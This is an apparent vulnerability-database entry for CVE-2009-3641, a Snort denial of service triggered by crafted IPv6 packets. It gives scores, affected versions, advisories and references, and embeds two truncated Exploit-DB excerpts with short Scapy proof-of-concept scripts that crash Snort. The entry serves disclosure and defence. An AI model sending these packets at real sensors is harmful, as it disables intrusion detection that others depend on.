CVE-2009-3641
published 2009-10-28
CVE-2009-3641: Snort before 2.8.5.1, when the -v option is enabled, allows remote attackers to cause a denial of service (application crash) via a crafted IPv6 packet that…
Priority P4 · 31 · medium · 4.3 · CVSS 2.0
AV:N / AC:M / Au:N / C:N / I:N / A:P
EXPLOIT
EPSS: 38.78% (98.4th percentile)
Snort before 2.8.5.1, when the -v option is enabled, allows remote attackers to cause a denial of service (application crash) via a crafted IPv6 packet that uses the (1) TCP or (2) ICMP protocol.
Affected
26 ranges · showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| snort | snort | <= 2.8.3.5 | — |
| snort | snort | — | — |
CVSS provenance
nvd · v2.0 · 4.3 · MEDIUM · AV:N/AC:M/Au:N/C:N/I:N/A:P
osv · 4.3 · MEDIUM
vendor_redhat · 4.3 · MEDIUM
GHSA
GHSA-56x5-r874-457f: Snort before 2
ghsa_unreviewed·2022-05-02
OSV
CVE-2009-3641: Snort before 2
osv·2009-10-28·CVSS 4.3
Red Hat
Snort: DoS (crash) while printing specially-crafted IPv6 packet using the -v option
vendor_redhat·2009-10-22·CVSS 4.3
No detection rules found.
Exploit-DB
Snort 2.8.5 - IPv6 Denial of Service
exploitdb·2009-10-23
---
- Date: October 22nd, 2009
- Discovered by: Laurent Gaffié
- Severity: Low
I. VULNERABILITY
Snort TCP
2) # works x86,x64
```python
#!/usr/bin/env python
from scapy.all import *
z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)
```
IV. SYSTEMS AFFECTED
These proofs of concept have been tested on Snort:
- 2.8.5
V. NOT AFFECTED
Sourcefire 3D Sensor
VI. SOLUTION
A new version correcting these issues has been released (2.8.5.1):
http://www.snort.org/downloads
VII. REFERENCES
http://www.snort.org/
http://vrt-sourcefire.blogspot.com/
VIII. REVISION HISTORY
October 14th, 2009: First issue discovered, advisory sent to Snort team.
October 14th, 2009: Snort security team confirms the bug.
October 16th, 2009: Sec
Exploit-DB
Snort 2.8.5 - Multiple Denial of Service Vulnerabilities
exploitdb·2009-10-22
---
source: https://www.securityfocus.com/bid/36795/info
Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets.
Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions.
These issues affect Snort 2.8.5; other versions may also be vulnerable.
You can reproduce these two different bugs easily by using the Python low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)
1) #only works on x86
```python
#!/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP
```
2) # works x86,x64
#/usr/bin/env python
from s
http://dl.snort.org/snort-current/release_notes_2851.txt
http://marc.info/?l=oss-security&m=125649553414700&w=2
http://seclists.org/fulldisclosure/2009/Oct/299
http://secunia.com/advisories/37135
http://securitytracker.com/id?1023076
http://vrt-sourcefire.blogspot.com/2009/10/snort-2851-release.html
http://www.openwall.com/lists/oss-security/2009/10/25/5
http://www.osvdb.org/59159
http://www.securityfocus.com/bid/36795
http://www.vupen.com/english/advisories/2009/3014
https://bugzilla.redhat.com/show_bug.cgi?id=530863
https://exchange.xforce.ibmcloud.com/vulnerabilities/53912
Published: 2009-10-28